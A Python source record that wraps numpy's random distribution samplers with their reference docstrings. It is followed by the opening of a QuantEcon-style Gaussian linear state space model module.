... np.exp(-(x - loc)**2 / (2 * scale**2)))
>>> plt.plot(x,g)
"""
return rand.laplace(loc=loc, scale=scale, size=size)
def samLogistic(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""logistic(loc=0.0, scale=1.0, size=None)
Draw samples from a logistic distribution.
Samples are drawn from a logistic distribution with specified
parameters, loc (location or mean, also median), and scale (>0).
Parameters
----------
loc : float
scale : float > 0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
where the values are all integers in [0, n].
See Also
--------
scipy.stats.distributions.logistic : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Logistic distribution is
.. math:: P(x) = P(x) = \frac{e^{-(x-\mu)/s}}{s(1+e^{-(x-\mu)/s})^2},
where :math:`\mu` = location and :math:`s` = scale.
The Logistic distribution is used in Extreme Value problems where it
can act as a mixture of Gumbel distributions, in Epidemiology, and by
the World Chess Federation (FIDE) where it is used in the Elo ranking
system, assuming the performance of each player is a logistically
distributed random variable.
References
----------
.. [1] Reiss, R.-D. and Thomas M. (2001), "Statistical Analysis of
Extreme Values, from Insurance, Finance, Hydrology and Other
Fields," Birkhauser Verlag, Basel, pp 132-133.
.. [2] Weisstein, Eric W. "Logistic Distribution." From
MathWorld--A Wolfram Web Resource.
http://mathworld.wolfram.com/LogisticDistribution.html
.. [3] Wikipedia, "Logistic-distribution",
http://en.wikipedia.org/wiki/Logistic_distribution
Examples
--------
Draw samples from the distribution:
>>> loc, scale = 10, 1
>>> s = np.random.logistic(loc, scale, 10000)
>>> count, bins, ignored = plt.hist(s, bins=50)
# plot against distribution
>>> def logist(x, loc, scale):
... return exp((loc-x)/scale)/(scale*(1+exp((loc-x)/scale))**2)
>>> plt.plot(bins, logist(bins, loc, scale)*count.max()/\
... logist(bins, loc, scale).max())
>>> plt.show()
"""
return rand.logistic(loc=loc, scale=scale, size=size)
def samLognormal(mean=0.0, sigma=1.0, size=None): # real signature unknown; restored from __doc__
"""lognormal(mean=0.0, sigma=1.0, size=None)
Draw samples from a log-normal distribution.
Draw samples from a log-normal distribution with specified mean,
standard deviation, and array shape. Note that the mean and standard
deviation are not the values for the distribution itself, but of the
underlying normal distribution it is derived from.
Parameters
----------
mean : float
Mean value of the underlying normal distribution
sigma : float, > 0.
Standard deviation of the underlying normal distribution
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or float
The desired samples. An array of the same shape as `size` if given,
if `size` is None a float is returned.
See Also
--------
scipy.stats.lognorm : probability density function, distribution,
cumulative density function, etc.
Notes
-----
A variable `x` has a log-normal distribution if `log(x)` is normally
distributed. The probability density function for the log-normal
distribution is:
.. math:: p(x) = \frac{1}{\sigma x \sqrt{2\pi}}
e^{(-\frac{(ln(x)-\mu)^2}{2\sigma^2})}
where :math:`\mu` is the mean and :math:`\sigma` is the standard
deviation of the normally distributed logarithm of the variable.
A log-normal distribution results if a random variable is the *product*
of a large number of independent, identically-distributed variables in
the same way that a normal distribution results if the variable is the
*sum* of a large number of independent, identically-distributed
variables.
References
----------
.. [1] Limpert, E., Stahel, W. A., and Abbt, M., "Log-normal
Distributions across the Sciences: Keys and Clues,"
BioScience, Vol. 51, No. 5, May, 2001.
http://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
.. [2] Reiss, R.D. and Thomas, M., "Statistical Analysis of Extreme
Values," Basel: Birkhauser Verlag, 2001, pp. 31-32.
Examples
--------
Draw samples from the distribution:
>>> mu, sigma = 3., 1. # mean and standard deviation
>>> s = np.random.lognormal(mu, sigma, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 100, normed=True, align='mid')
>>> x = np.linspace(min(bins), max(bins), 10000)
>>> pdf = (np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))
... / (x * sigma * np.sqrt(2 * np.pi)))
>>> plt.plot(x, pdf, linewidth=2, color='r')
>>> plt.axis('tight')
>>> plt.show()
Demonstrate that taking the products of random samples from a uniform
distribution can be fit well by a log-normal probability density
function.
>>> # Generate a thousand samples: each is the product of 100 random
>>> # values, drawn from a normal distribution.
>>> b = []
>>> for i in range(1000):
... a = 10. + np.random.random(100)
... b.append(np.product(a))
>>> b = np.array(b) / np.min(b) # scale values to be positive
>>> count, bins, ignored = plt.hist(b, 100, normed=True, align='mid')
>>> sigma = np.std(np.log(b))
>>> mu = np.mean(np.log(b))
>>> x = np.linspace(min(bins), max(bins), 10000)
>>> pdf = (np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))
... / (x * sigma * np.sqrt(2 * np.pi)))
>>> plt.plot(x, pdf, color='r', linewidth=2)
>>> plt.show()
"""
return rand.lognormal(mean=mean, sigma=sigma, size=size)
def samNormal(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""normal(loc=0.0, scale=1.0, size=None)
Draw random samples from a normal (Gaussian) distribution.
The probability density function of the normal distribution, first
derived by De Moivre and 200 years later by both Gauss and Laplace
independently [2]_, is often called the bell curve because of
its characteristic shape (see the example below).
The normal distributions occurs often in nature. For example, it
describes the commonly occurring distribution of samples influenced
by a large number of tiny, random disturbances, each with its own
unique distribution [2]_.
Parameters
----------
loc : float
Mean ("centre") of the distribution.
scale : float
Standard deviation (spread or "width") of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
See Also
--------
scipy.stats.distributions.norm : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Gaussian distribution is
.. math:: p(x) = \frac{1}{\sqrt{ 2 \pi \sigma^2 }}
e^{ - \frac{ (x - \mu)^2 } {2 \sigma^2} },
where :math:`\mu` is the mean and :math:`\sigma` the standard
deviation. The square of the standard deviation, :math:`\sigma^2`,
is called the variance.
The function has its peak at the mean, and its "spread" increases with
the standard deviation (the function reaches 0.607 times its maximum at
:math:`x + \sigma` and :math:`x - \sigma` [2]_). This implies that
`numpy.random.normal` is more likely to return samples lying close to
the mean, rather than those far away.
References
----------
.. [1] Wikipedia, "Normal distribution",
http://en.wikipedia.org/wiki/Normal_distribution
.. [2] P. R. Peebles Jr., "Central Limit Theorem" in "Probability,
Random Variables and Random Signal Principles", 4th ed., 2001,
pp. 51, 51, 125.
Examples
--------
Draw samples from the distribution:
>>> mu, sigma = 0, 0.1 # mean and standard deviation
>>> s = np.random.normal(mu, sigma, 1000)
Verify the mean and the variance:
>>> abs(mu - np.mean(s)) < 0.01
True
>>> abs(sigma - np.std(s, ddof=1)) < 0.01
True
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 30, normed=True)
>>> plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) *
... np.exp( - (bins - mu)**2 / (2 * sigma**2) ),
... linewidth=2, color='r')
>>> plt.show()
"""
return rand.normal(loc=loc, scale=scale, size=size)
def samPareto(a=3.0, size=None): # real signature unknown; restored from __doc__
"""pareto(a, size=None)
Draw samples from a Pareto II or Lomax distribution with
specified shape.
The Lomax or Pareto II distribution is a shifted Pareto
distribution. The classical Pareto distribution can be
obtained from the Lomax distribution by adding 1 and
multiplying by the scale parameter ``m`` (see Notes). The
smallest value of the Lomax distribution is zero while for the
classical Pareto distribution it is ``mu``, where the standard
Pareto distribution has location ``mu = 1``. Lomax can also
be considered as a simplified version of the Generalized
Pareto distribution (available in SciPy), with the scale set
to one and the location set to zero.
The Pareto distribution must be greater than zero, and is
unbounded above. It is also known as the "80-20 rule". In
this distribution, 80 percent of the weights are in the lowest
20 percent of the range, while the other 20 percent fill the
remaining 80 percent of the range.
Parameters
----------
shape : float, > 0.
Shape of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
See Also
--------
scipy.stats.distributions.lomax.pdf : probability density function,
distribution or cumulative density function, etc.
scipy.stats.distributions.genpareto.pdf : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Pareto distribution is
.. math:: p(x) = \frac{am^a}{x^{a+1}}
where :math:`a` is the shape and :math:`m` the scale.
The Pareto distribution, named after the Italian economist
Vilfredo Pareto, is a power law probability distribution
useful in many real world problems. Outside the field of
economics it is generally referred to as the Bradford
distribution. Pareto developed the distribution to describe
the distribution of wealth in an economy. It has also found
use in insurance, web page access statistics, oil field sizes,
and many other problems, including the download frequency for
01-codes in Sourceforge [1]_. It is one of the so-called
"fat-tailed" distributions.
References
----------
.. [1] Francis Hunt and Paul Johnson, On the Pareto Distribution of
Sourceforge 01-codes.
.. [2] Pareto, V. (1896). Course of Political Economy. Lausanne.
.. [3] Reiss, R.D., Thomas, M.(2001), Statistical Analysis of Extreme
Values, Birkhauser Verlag, Basel, pp 23-30.
.. [4] Wikipedia, "Pareto distribution",
http://en.wikipedia.org/wiki/Pareto_distribution
Examples
--------
Draw samples from the distribution:
>>> a, m = 3., 2. # shape and mode
>>> s = (np.random.pareto(a, 1000) + 1) * m
Display the histogram of the samples, along with the probability
density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, _ = plt.hist(s, 100, normed=True)
>>> fit = a*m**a / bins**(a+1)
>>> plt.plot(bins, max(count)*fit/max(fit), linewidth=2, color='r')
>>> plt.show()
"""
return rand.pareto(a=a, size=size)
def samPoisson(lam=1.0, size=None): # real signature unknown; restored from __doc__
"""poisson(lam=1.0, size=None)
Draw samples from a Poisson distribution.
The Poisson distribution is the limit of the binomial distribution
for large N.
Parameters
----------
lam : float or sequence of float
Expectation of interval, should be >= 0. A sequence of expectation
intervals must be broadcastable over the requested size.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
The drawn samples, of shape *size*, if it was provided.
Notes
-----
The Poisson distribution
.. math:: f(k; \lambda)=\frac{\lambda^k e^{-\lambda}}{k!}
For events with an expected separation :math:`\lambda` the Poisson
distribution :math:`f(k; \lambda)` describes the probability of
:math:`k` events occurring within the observed
interval :math:`\lambda`.
Because the output is limited to the range of the C long type, a
ValueError is raised when `lam` is within 10 sigma of the maximum
representable value.
References
----------
.. [1] Weisstein, Eric W. "Poisson Distribution."
From MathWorld--A Wolfram Web Resource.
http://mathworld.wolfram.com/PoissonDistribution.html
.. [2] Wikipedia, "Poisson distribution",
http://en.wikipedia.org/wiki/Poisson_distribution
Examples
--------
Draw samples from the distribution:
>>> import numpy as np
>>> s = np.random.poisson(5, 10000)
Display histogram of the sample:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 14, normed=True)
>>> plt.show()
Draw each 100 values for lambda 100 and 500:
>>> s = np.random.poisson(lam=(100., 500.), size=(100, 2))
"""
return rand.poisson(lam=lam, size=size)
def samPower(a=5.0, size=None): # real signature unknown; restored from __doc__
"""power(a, size=None)
Draws samples in [0, 1] from a power distribution with positive
exponent a - 1.
Also known as the power function distribution.
Parameters
----------
a : float
parameter, > 0
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
The returned samples lie in [0, 1].
Raises
------
ValueError
If a < 1.
Notes
-----
The probability density function is
.. math:: P(x; a) = ax^{a-1}, 0 \le x \le 1, a>0.
The power function distribution is just the inverse of the Pareto
distribution. It may also be seen as a special case of the Beta
distribution.
It is used, for example, in modeling the over-reporting of insurance
claims.
References
----------
.. [1] Christian Kleiber, Samuel Kotz, "Statistical size distributions
in economics and actuarial sciences", Wiley, 2003.
.. [2] Heckert, N. A. and Filliben, James J. "NIST Handbook 148:
Dataplot Reference Manual, Volume 2: Let Subcommands and Library
Functions", National Institute of Standards and Technology
Handbook Series, June 2003.
http://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
Examples
--------
Draw samples from the distribution:
>>> a = 5. # shape
>>> samples = 1000
>>> s = np.random.power(a, samples)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, bins=30)
>>> x = np.linspace(0, 1, 100)
>>> y = a*x**(a-1.)
>>> normed_y = samples*np.diff(bins)[0]*y
>>> plt.plot(x, normed_y)
>>> plt.show()
Compare the power function distribution to the inverse of the Pareto.
>>> from scipy import stats
>>> rvs = np.random.power(5, 1000000)
>>> rvsp = np.random.pareto(5, 1000000)
>>> xx = np.linspace(0,1,100)
>>> powpdf = stats.powerlaw.pdf(xx,5)
>>> plt.figure()
>>> plt.hist(rvs, bins=50, normed=True)
>>> plt.plot(xx,powpdf,'r-')
>>> plt.title('np.random.power(5)')
>>> plt.figure()
>>> plt.hist(1./(1.+rvsp), bins=50, normed=True)
>>> plt.plot(xx,powpdf,'r-')
>>> plt.title('inverse of 1 + np.random.pareto(5)')
>>> plt.figure()
>>> plt.hist(1./(1.+rvsp), bins=50, normed=True)
>>> plt.plot(xx,powpdf,'r-')
>>> plt.title('inverse of stats.pareto(5)')
"""
return rand.power(a=a, size=size)
def samRayleigh(scale=1.0, size=None): # real signature unknown; restored from __doc__
"""rayleigh(scale=1.0, size=None)
Draw samples from a Rayleigh distribution.
The :math:`\chi` and Weibull distributions are generalizations of the
Rayleigh.
Parameters
----------
scale : scalar
Scale, also equals the mode. Should be >= 0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Notes
-----
The probability density function for the Rayleigh distribution is
.. math:: P(x;scale) = \frac{x}{scale^2}e^{\frac{-x^2}{2 \cdotp scale^2}}
The Rayleigh distribution would arise, for example, if the East
and North components of the wind velocity had identical zero-mean
Gaussian distributions. Then the wind speed would have a Rayleigh
distribution.
References
----------
.. [1] Brighton Webs Ltd., "Rayleigh Distribution,"
http://www.brighton-webs.co.uk/distributions/rayleigh.asp
.. [2] Wikipedia, "Rayleigh distribution"
http://en.wikipedia.org/wiki/Rayleigh_distribution
Examples
--------
Draw values from the distribution and plot the histogram
>>> values = hist(np.random.rayleigh(3, 100000), bins=200, normed=True)
Wave heights tend to follow a Rayleigh distribution. If the mean wave
height is 1 meter, what fraction of waves are likely to be larger than 3
meters?
>>> meanvalue = 1
>>> modevalue = np.sqrt(2 / np.pi) * meanvalue
>>> s = np.random.rayleigh(modevalue, 1000000)
The percentage of waves larger than 3 meters is:
>>> 100.*sum(s>3)/1000000.
0.087300000000000003
"""
return rand.rayleigh(scale=scale, size=size)
def samTriangular(left=-3, mode=0, right=8, size=None): # real signature unknown; restored from __doc__
"""triangular(left, mode, right, size=None)
Draw samples from the triangular distribution.
The triangular distribution is a continuous probability
distribution with lower limit left, peak at mode, and upper
limit right. Unlike the other distributions, these parameters
directly define the shape of the pdf.
Parameters
----------
left : scalar
Lower limit.
mode : scalar
The value where the peak of the distribution occurs.
The value should fulfill the condition ``left <= mode <= right``.
right : scalar
Upper limit, should be larger than `left`.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
The returned samples all lie in the interval [left, right].
Notes
-----
The probability density function for the triangular distribution is
.. math:: P(x;l, m, r) = \begin{cases}
\frac{2(x-l)}{(r-l)(m-l)}& \text{for $l \leq x \leq m$},\\
\frac{2(m-x)}{(r-l)(r-m)}& \text{for $m \leq x \leq r$},\\
0& \text{otherwise}.
\end{cases}
The triangular distribution is often used in ill-defined
problems where the underlying distribution is not known, but
some knowledge of the limits and mode exists. Often it is used
in simulations.
References
----------
.. [1] Wikipedia, "Triangular distribution"
http://en.wikipedia.org/wiki/Triangular_distribution
Examples
--------
Draw values from the distribution and plot the histogram:
>>> import matplotlib.pyplot as plt
>>> h = plt.hist(np.random.triangular(-3, 0, 8, 100000), bins=200,
... normed=True)
>>> plt.show()
"""
return rand.triangular(left=left, mode=mode, right=right, size=size)
def samUniform(low=0.0, high=1.0, size=None): # real signature unknown; restored from __doc__
"""uniform(low=0.0, high=1.0, size=None)
Draw samples from a uniform distribution.
Samples are uniformly distributed over the half-open interval
``[low, high)`` (includes low, but excludes high). In other words,
any value within the given interval is equally likely to be drawn
by `uniform`.
Parameters
----------
low : float, optional
Lower boundary of the output interval. All values generated will be
greater than or equal to low. The default value is 0.
high : float
Upper boundary of the output interval. All values generated will be
less than high. The default value is 1.0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
out : ndarray
Drawn samples, with shape `size`.
See Also
--------
randint : Discrete uniform distribution, yielding integers.
random_integers : Discrete uniform distribution over the closed
interval ``[low, high]``.
random_sample : Floats uniformly distributed over ``[0, 1)``.
random : Alias for `random_sample`.
rand : Convenience function that accepts dimensions as input, e.g.,
``rand(2,2)`` would generate a 2-by-2 array of floats,
uniformly distributed over ``[0, 1)``.
Notes
-----
The probability density function of the uniform distribution is
.. math:: p(x) = \frac{1}{b - a}
anywhere within the interval ``[a, b)``, and zero elsewhere.
Examples
--------
Draw samples from the distribution:
>>> s = np.random.uniform(-1,0,1000)
All values are within the given interval:
>>> np.all(s >= -1)
True
>>> np.all(s < 0)
True
Display the histogram of the samples, along with the
probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 15, normed=True)
>>> plt.plot(bins, np.ones_like(bins), linewidth=2, color='r')
>>> plt.show()
"""
return rand.uniform(low=low, high=high, size=size)
def samVonmises(mu=0.0, kappa=4.0, size=None): # real signature unknown; restored from __doc__
"""vonmises(mu, kappa, size=None)
Draw samples from a von Mises distribution.
Samples are drawn from a von Mises distribution with specified mode
(mu) and dispersion (kappa), on the interval [-pi, pi].
The von Mises distribution (also known as the circular normal
distribution) is a continuous probability distribution on the unit
circle. It may be thought of as the circular analogue of the normal
distribution.
Parameters
----------
mu : float
Mode ("center") of the distribution.
kappa : float
Dispersion of the distribution, has to be >=0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : scalar or ndarray
The returned samples, which are in the interval [-pi, pi].
See Also
--------
scipy.stats.distributions.vonmises : probability density function,
distribution, or cumulative density function, etc.
Notes
-----
The probability density for the von Mises distribution is
.. math:: p(x) = \frac{e^{\kappa cos(x-\mu)}}{2\pi I_0(\kappa)},
where :math:`\mu` is the mode and :math:`\kappa` the dispersion,
and :math:`I_0(\kappa)` is the modified Bessel function of order 0.
The von Mises is named for Richard Edler von Mises, who was born in
Austria-Hungary, in what is now the Ukraine. He fled to the United
States in 1939 and became a professor at Harvard. He worked in
probability theory, aerodynamics, fluid mechanics, and philosophy of
science.
References
----------
.. [1] Abramowitz, M. and Stegun, I. A. (Eds.). "Handbook of
Mathematical Functions with Formulas, Graphs, and Mathematical
Tables, 9th printing," New York: Dover, 1972.
.. [2] von Mises, R., "Mathematical Theory of Probability
and Statistics", New York: Academic Press, 1964.
Examples
--------
Draw samples from the distribution:
>>> mu, kappa = 0.0, 4.0 # mean and dispersion
>>> s = np.random.vonmises(mu, kappa, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> from scipy.special import i0
>>> plt.hist(s, 50, normed=True)
>>> x = np.linspace(-np.pi, np.pi, num=51)
>>> y = np.exp(kappa*np.cos(x-mu))/(2*np.pi*i0(kappa))
>>> plt.plot(x, y, linewidth=2, color='r')
>>> plt.show()
"""
return rand.vonmises(mu=mu, kappa=kappa, size=size)
def samWald(mean=3, scale=2, size=None): # real signature unknown; restored from __doc__
"""wald(mean, scale, size=None)
Draw samples from a Wald, or inverse Gaussian, distribution.
As the scale approaches infinity, the distribution becomes more like a
Gaussian. Some references claim that the Wald is an inverse Gaussian
with mean equal to 1, but this is by no means universal.
The inverse Gaussian distribution was first studied in relationship to
Brownian motion. In 1956 M.C.K. Tweedie used the name inverse Gaussian
because there is an inverse relationship between the time to cover a
unit distance and distance covered in unit time.
Parameters
----------
mean : scalar
Distribution mean, should be > 0.
scale : scalar
Scale parameter, should be >= 0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
Drawn sample, all greater than zero.
Notes
-----
The probability density function for the Wald distribution is
.. math:: P(x;mean,scale) = \sqrt{\frac{scale}{2\pi x^3}}e^
\frac{-scale(x-mean)^2}{2\cdotp mean^2x}
As noted above the inverse Gaussian distribution first arise
from attempts to model Brownian motion. It is also a
competitor to the Weibull for use in reliability modeling and
modeling stock returns and interest rate processes.
References
----------
.. [1] Brighton Webs Ltd., Wald Distribution,
http://www.brighton-webs.co.uk/distributions/wald.asp
.. [2] Chhikara, Raj S., and Folks, J. Leroy, "The Inverse Gaussian
Distribution: Theory : Methodology, and Applications", CRC Press,
1988.
.. [3] Wikipedia, "Wald distribution"
http://en.wikipedia.org/wiki/Wald_distribution
Examples
--------
Draw values from the distribution and plot the histogram:
>>> import matplotlib.pyplot as plt
>>> h = plt.hist(np.random.wald(3, 2, 100000), bins=200, normed=True)
>>> plt.show()
"""
return rand.wald(mean=mean, scale=scale, size=size)
def samWeibull(a=5.0, size=None): # real signature unknown; restored from __doc__
"""weibull(a, size=None)
Draw samples from a Weibull distribution.
Draw samples from a 1-parameter Weibull distribution with the given
shape parameter `a`.
.. math:: X = (-ln(U))^{1/a}
Here, U is drawn from the uniform distribution over (0,1].
The more common 2-parameter Weibull, including a scale parameter
:math:`\lambda` is just :math:`X = \lambda(-ln(U))^{1/a}`.
Parameters
----------
a : float
Shape of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray
See Also
--------
scipy.stats.distributions.weibull_max
scipy.stats.distributions.weibull_min
scipy.stats.distributions.genextreme
gumbel
Notes
-----
The Weibull (or Type III asymptotic extreme value distribution
for smallest values, SEV Type III, or Rosin-Rammler
distribution) is one of a class of Generalized Extreme Value
(GEV) distributions used in modeling extreme value problems.
This class includes the Gumbel and Frechet distributions.
The probability density for the Weibull distribution is
.. math:: p(x) = \frac{a}
{\lambda}(\frac{x}{\lambda})^{a-1}e^{-(x/\lambda)^a},
where :math:`a` is the shape and :math:`\lambda` the scale.
The function has its peak (the mode) at
:math:`\lambda(\frac{a-1}{a})^{1/a}`.
When ``a = 1``, the Weibull distribution reduces to the exponential
distribution.
References
----------
.. [1] Waloddi Weibull, Royal Technical University, Stockholm,
1939 "A Statistical Theory Of The Strength Of Materials",
Ingeniorsvetenskapsakademiens Handlingar Nr 151, 1939,
Generalstabens Litografiska Anstalts Forlag, Stockholm.
.. [2] Waloddi Weibull, "A Statistical Distribution Function of
Wide Applicability", Journal Of Applied Mechanics ASME Paper
1951.
.. [3] Wikipedia, "Weibull distribution",
http://en.wikipedia.org/wiki/Weibull_distribution
Examples
--------
Draw samples from the distribution:
>>> a = 5. # shape
>>> s = np.random.weibull(a, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> x = np.arange(1,100.)/50.
>>> def weib(x,n,a):
... return (a / n) * (x / n)**(a - 1) * np.exp(-(x / n)**a)
>>> count, bins, ignored = plt.hist(np.random.weibull(5.,1000))
>>> x = np.arange(1,100.)/50.
>>> scale = count.max()/weib(x, 1., 5.).max()
>>> plt.plot(x, weib(x, 1., 5.)*scale)
>>> plt.show()
"""
return rand.weibull(a=a, size=size)
def samZipf(a=2.0, size=None): # real signature unknown; restored from __doc__
"""zipf(a, size=None)
Draw samples from a Zipf distribution.
Samples are drawn from a Zipf distribution with specified parameter
`a` > 1.
The Zipf distribution (also known as the zeta distribution) is a
continuous probability distribution that satisfies Zipf's law: the
frequency of an item is inversely proportional to its rank in a
frequency table.
Parameters
----------
a : float > 1
Distribution parameter.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : scalar or ndarray
The returned samples are greater than or equal to one.
See Also
--------
scipy.stats.distributions.zipf : probability density function,
distribution, or cumulative density function, etc.
Notes
-----
The probability density for the Zipf distribution is
.. math:: p(x) = \frac{x^{-a}}{\zeta(a)},
where :math:`\zeta` is the Riemann Zeta function.
It is named for the American linguist George Kingsley Zipf, who noted
that the frequency of any word in a sample of a language is inversely
proportional to its rank in the frequency table.
References
----------
.. [1] Zipf, G. K., "Selected Studies of the Principle of Relative
Frequency in Language," Cambridge, MA: Harvard Univ. Press,
1932.
Examples
--------
Draw samples from the distribution:
>>> a = 2. # parameter
>>> s = np.random.zipf(a, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> import scipy.special as sps
Truncate s values at 50 so plot is interesting
>>> count, bins, ignored = plt.hist(s[s<50], 50, normed=True)
>>> x = np.arange(1., 50.)
>>> y = x**(-a)/sps.zetac(a)
>>> plt.plot(x, y/max(y), linewidth=2, color='r')
>>> plt.show()
"""
return rand.zipf(a=a, size=size)
|
DailyActie/Surrogate-Model
|
surrogate/sampling/samRandom.py
|
Python
|
mit
| 56,444
|
[
"Gaussian"
] |
ffc816185b298a568d71c1cde06ca3414e01ed8c01c9f82ae3e10aca14fc9c0c
|
"""
Filename: lss.py
Reference: http://quant-econ.net/py/linear_models.html
Computes quantities associated with the Gaussian linear state space model.
"""
from textwrap import dedent
import numpy as np
from numpy.random import multivariate_normal
from scipy.linalg import solve
import warnings
#-Check if Numba is Available-#
from .external import numba_installed, jit
def simulate_linear_model(A, x0, v, ts_length):
"""
This is a separate function for simulating a vector linear system of
the form
x_{t+1} = A x_t + v_t given x_0 = x0
Here x_t and v_t are both n x 1 and A is n x n.
The purpose of separating this functionality out is to target it for
optimization by Numba. For the same reason, matrix multiplication is
broken down into for loops.
Parameters
----------
A : array_like or scalar(float)
Should be n x n
x0 : array_like
Should be n x 1. Initial condition
v : np.ndarray
Should be n x ts_length-1. Its t-th column is used as the time t
shock v_t
ts_length : int
The length of the time series
Returns
--------
x : np.ndarray
Time series with ts_length columns, the t-th column being x_t
"""
A = np.asarray(A)
n = A.shape[0]
x = np.empty((n, ts_length))
x[:, 0] = x0
for t in range(ts_length-1):
# x[:, t+1] = A.dot(x[:, t]) + v[:, t]
for i in range(n):
x[i, t+1] = v[i, t]
for j in range(n):
x[i, t+1] += A[i, j] * x[j, t]
return x
if numba_installed:
simulate_linear_model = jit(simulate_linear_model)
class LinearStateSpace(object):
"""
A class that describes a Gaussian linear state space model of the
form:
x_{t+1} = A x_t + C w_{t+1}
y_t = G x_t + H v_t
where {w_t} and {v_t} are independent and standard normal with dimensions
k and l respectively. The initial conditions are mu_0 and Sigma_0 for x_0
~ N(mu_0, Sigma_0). When Sigma_0=0, the draw of x_0 is exactly mu_0.
Parameters
----------
A : array_like or scalar(float)
Part of the state transition equation. It should be `n x n`
C : array_like or scalar(float)
Part of the state transition equation. It should be `n x m`
G : array_like or scalar(float)
Part of the observation equation. It should be `k x n`
H : array_like or scalar(float), optional(default=None)
Part of the observation equation. It should be `k x l`
mu_0 : array_like or scalar(float), optional(default=None)
This is the mean of initial draw and is `n x 1`
Sigma_0 : array_like or scalar(float), optional(default=None)
This is the variance of the initial draw and is `n x n` and
also should be positive definite and symmetric
Attributes
----------
A, C, G, H, mu_0, Sigma_0 : see Parameters
n, k, m, l : scalar(int)
The dimensions of x_t, y_t, w_t and v_t respectively
"""
def __init__(self, A, C, G, H=None, mu_0=None, Sigma_0=None):
self.A, self.G, self.C = list(map(self.convert, (A, G, C)))
self.k, self.n = self.G.shape
self.m = self.C.shape[1]
if H is None:
self.H = None
self.l = None
else:
self.H = self.convert(H)
self.l = self.H.shape[1]
if mu_0 is None:
self.mu_0 = np.zeros((self.n, 1))
else:
self.mu_0 = self.convert(mu_0)
self.mu_0.shape = self.n, 1
if Sigma_0 is None:
self.Sigma_0 = np.zeros((self.n, self.n))
else:
self.Sigma_0 = self.convert(Sigma_0)
def __repr__(self):
return self.__str__()
def __str__(self):
m = """\
Linear Gaussian state space model:
- dimension of state space : {n}
- number of innovations : {m}
- dimension of observation equation : {k}
"""
return dedent(m.format(n=self.n, k=self.k, m=self.m))
def convert(self, x):
"""
Convert array_like objects (lists of lists, floats, etc.) into
well formed 2D NumPy arrays
"""
return np.atleast_2d(np.asarray(x, dtype='float32'))
def simulate(self, ts_length=100):
"""
Simulate a time series of length ts_length, first drawing
x_0 ~ N(mu_0, Sigma_0)
Parameters
----------
ts_length : scalar(int), optional(default=100)
The length of the simulation
Returns
-------
x : array_like(float)
An n x ts_length array, where the t-th column is x_t
y : array_like(float)
A k x ts_length array, where the t-th column is y_t
"""
x0 = multivariate_normal(self.mu_0.flatten(), self.Sigma_0)
w = np.random.randn(self.m, ts_length-1)
v = self.C.dot(w) # Multiply each w_t by C to get v_t = C w_t
# == simulate time series == #
x = simulate_linear_model(self.A, x0, v, ts_length)
if self.H is not None:
v = np.random.randn(self.l, ts_length)
y = self.G.dot(x) + self.H.dot(v)
else:
y = self.G.dot(x)
return x, y
def replicate(self, T=10, num_reps=100):
"""
Simulate num_reps observations of x_T and y_T given
